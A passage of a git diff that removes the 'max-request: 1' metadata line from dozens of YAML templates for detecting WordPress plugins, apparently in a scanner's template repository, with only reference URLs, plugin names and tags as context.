+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/premium-addons-for-elementor/
metadata:
- max-request: 1
plugin_namespace: premium-addons-for-elementor
wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e82..afc1141e0c 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/pretty-link/
metadata:
- max-request: 1
plugin_namespace: pretty-link
wpscan: https://wpscan.com/plugin/pretty-link
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4eb..d44add9ca6 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/really-simple-captcha/
metadata:
- max-request: 1
plugin_namespace: really-simple-captcha
wpscan: https://wpscan.com/plugin/really-simple-captcha
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 12dffeb534..20ba5c2e16 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/really-simple-ssl/
metadata:
- max-request: 1
plugin_namespace: really-simple-ssl
wpscan: https://wpscan.com/plugin/really-simple-ssl
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb..cbcf3cf09d 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/redirection/
metadata:
- max-request: 1
plugin_namespace: redirection
wpscan: https://wpscan.com/plugin/redirection
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb..3311d42c94 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/redux-framework/
metadata:
- max-request: 1
plugin_namespace: redux-framework
wpscan: https://wpscan.com/plugin/redux-framework
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d55..46c1c22805 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/regenerate-thumbnails/
metadata:
- max-request: 1
plugin_namespace: regenerate-thumbnails
wpscan: https://wpscan.com/plugin/regenerate-thumbnails
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0..7c13b8d2a4 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/safe-svg/
metadata:
- max-request: 1
plugin_namespace: safe-svg
wpscan: https://wpscan.com/plugin/safe-svg
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e6..53b30ba721 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/seo-by-rank-math/
metadata:
- max-request: 1
plugin_namespace: seo-by-rank-math
wpscan: https://wpscan.com/plugin/seo-by-rank-math
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 6bd95ec077..9555d7aebd 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/sg-cachepress/
metadata:
- max-request: 1
plugin_namespace: sg-cachepress
wpscan: https://wpscan.com/plugin/sg-cachepress
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 1fd64a5279..180266f448 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/sg-security/
metadata:
- max-request: 1
plugin_namespace: sg-security
wpscan: https://wpscan.com/plugin/sg-security
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 648ee176ce..656ad7dfe5 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/shortcodes-ultimate/
metadata:
- max-request: 1
plugin_namespace: shortcodes-ultimate
wpscan: https://wpscan.com/plugin/shortcodes-ultimate
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c..015fb97043 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/shortpixel-image-optimiser/
metadata:
- max-request: 1
plugin_namespace: shortpixel-image-optimiser
wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a..1d5224b457 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/simple-custom-post-order/
metadata:
- max-request: 1
plugin_namespace: simple-custom-post-order
wpscan: https://wpscan.com/plugin/simple-custom-post-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b3..aafd6c6a38 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/siteguard/
metadata:
- max-request: 1
plugin_namespace: siteguard
wpscan: https://wpscan.com/plugin/siteguard
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61..e10ab985da 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/siteorigin-panels/
metadata:
- max-request: 1
plugin_namespace: siteorigin-panels
wpscan: https://wpscan.com/plugin/siteorigin-panels
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9e..9881b591ae 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/smart-slider-3/
metadata:
- max-request: 1
plugin_namespace: smart-slider-3
wpscan: https://wpscan.com/plugin/smart-slider-3
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc58..0480b4b0e6 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/so-widgets-bundle/
metadata:
- max-request: 1
plugin_namespace: so-widgets-bundle
wpscan: https://wpscan.com/plugin/so-widgets-bundle
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f..26d525386b 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
metadata:
- max-request: 1
plugin_namespace: stops-core-theme-and-plugin-updates
wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9..3920c5cf56 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/sucuri-scanner/
metadata:
- max-request: 1
plugin_namespace: sucuri-scanner
wpscan: https://wpscan.com/plugin/sucuri-scanner
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150..f556786f5a 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/svg-support/
metadata:
- max-request: 1
plugin_namespace: svg-support
wpscan: https://wpscan.com/plugin/svg-support
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599..844e3d19a0 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/table-of-contents-plus/
metadata:
- max-request: 1
plugin_namespace: table-of-contents-plus
wpscan: https://wpscan.com/plugin/table-of-contents-plus
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279..eb0f02f602 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/tablepress/
metadata:
- max-request: 1
plugin_namespace: tablepress
wpscan: https://wpscan.com/plugin/tablepress
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d80..755efd53fa 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/taxonomy-terms-order/
metadata:
- max-request: 1
plugin_namespace: taxonomy-terms-order
wpscan: https://wpscan.com/plugin/taxonomy-terms-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11e..0403bb4e72 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/the-events-calendar/
metadata:
- max-request: 1
plugin_namespace: the-events-calendar
wpscan: https://wpscan.com/plugin/the-events-calendar
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d9..cd2632ea05 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/themeisle-companion/
metadata:
- max-request: 1
plugin_namespace: themeisle-companion
wpscan: https://wpscan.com/plugin/themeisle-companion
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6..b5f8b822c7 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/tinymce-advanced/
metadata:
- max-request: 1
plugin_namespace: tinymce-advanced
wpscan: https://wpscan.com/plugin/tinymce-advanced
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44..85aaf7ff16 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/translatepress-multilingual/
metadata:
- max-request: 1
plugin_namespace: translatepress-multilingual
wpscan: https://wpscan.com/plugin/translatepress-multilingual
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f..0af322b728 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
metadata:
- max-request: 1
plugin_namespace: ultimate-addons-for-gutenberg
wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 48481fde3b..b7ad16e281 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/under-construction-page/
metadata:
- max-request: 1
plugin_namespace: under-construction-page
wpscan: https://wpscan.com/plugin/under-construction-page
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index b34d196268..10fd071b0b 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/updraftplus/
metadata:
- max-request: 1
plugin_namespace: updraftplus
wpscan: https://wpscan.com/plugin/updraftplus
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec3..401b0e479f 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/use-any-font/
metadata:
- max-request: 1
plugin_namespace: use-any-font
wpscan: https://wpscan.com/plugin/use-any-font
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a6..6f95506748 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/user-role-editor/
metadata:
- max-request: 1
plugin_namespace: user-role-editor
wpscan: https://wpscan.com/plugin/user-role-editor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf..4404f87aab 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/velvet-blues-update-urls/
metadata:
- max-request: 1
plugin_namespace: velvet-blues-update-urls
wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad7..8995434fce 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/w3-total-cache/
metadata:
- max-request: 1
plugin_namespace: w3-total-cache
wpscan: https://wpscan.com/plugin/w3-total-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8..8175806cb8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/webp-converter-for-media/
metadata:
- max-request: 1
plugin_namespace: webp-converter-for-media
wpscan: https://wpscan.com/plugin/webp-converter-for-media
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89f..db82bc7f43 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/webp-express/
metadata:
- max-request: 1
plugin_namespace: webp-express
wpscan: https://wpscan.com/plugin/webp-express
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c..03ddae57bc 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/widget-importer-exporter/
metadata:
- max-request: 1
plugin_namespace: widget-importer-exporter
wpscan: https://wpscan.com/plugin/widget-importer-exporter
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198e..d6449bb5bf 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woo-cart-abandonment-recovery/
metadata:
- max-request: 1
plugin_namespace: woo-cart-abandonment-recovery
wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078eb..2d5fdf1779 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woo-checkout-field-editor-pro/
metadata:
- max-request: 1
plugin_namespace: woo-checkout-field-editor-pro
wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce674116..6b5705e20d 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woo-variation-swatches/
metadata:
- max-request: 1
plugin_namespace: woo-variation-swatches
wpscan: https://wpscan.com/plugin/woo-variation-swatches
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058..dbcdb64bad 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
metadata:
- max-request: 1
plugin_namespace: woocommerce-gateway-paypal-express-checkout
wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb5..fb9ea502ce 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-gateway-stripe/
metadata:
- max-request: 1
plugin_namespace: woocommerce-gateway-stripe
wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 54dce49b42..1d41b4ec2c 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-payments/
metadata:
- max-request: 1
plugin_namespace: woocommerce-payments
wpscan: https://wpscan.com/plugin/woocommerce-payments
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd..4fa6fc3ffe 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-paypal-payments/
metadata:
- max-request: 1
plugin_namespace: woocommerce-paypal-payments
wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8..1c1c690fcd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
metadata:
- max-request: 1
plugin_namespace: woocommerce-pdf-invoices-packing-slips
wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d26..4d6702d81a 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-services/
metadata:
- max-request: 1
plugin_namespace: woocommerce-services
wpscan: https://wpscan.com/plugin/woocommerce-services
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccb..42cb8bc409 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce/
metadata:
- max-request: 1
plugin_namespace: woocommerce
wpscan: https://wpscan.com/plugin/woocommerce
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd79..55d6effbf5 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wordfence/
metadata:
- max-request: 1
plugin_namespace: wordfence
wpscan: https://wpscan.com/plugin/wordfence
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c48..6786cab703 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wordpress-importer/
metadata:
- max-request: 1
plugin_namespace: wordpress-importer
wpscan: https://wpscan.com/plugin/wordpress-importer
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25..784ba22c8a 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wordpress-seo/
metadata:
- max-request: 1
plugin_namespace: wordpress-seo
wpscan: https://wpscan.com/plugin/wordpress-seo
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed6..72ff55e58a 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/worker/
metadata:
- max-request: 1
plugin_namespace: worker
wpscan: https://wpscan.com/plugin/worker
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be568..8cfaa0f5a9 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-fastest-cache/
metadata:
- max-request: 1
plugin_namespace: wp-fastest-cache
wpscan: https://wpscan.com/plugin/wp-fastest-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b824..85900a01a7 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-file-manager/
metadata:
- max-request: 1
plugin_namespace: wp-file-manager
wpscan: https://wpscan.com/plugin/wp-file-manager
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
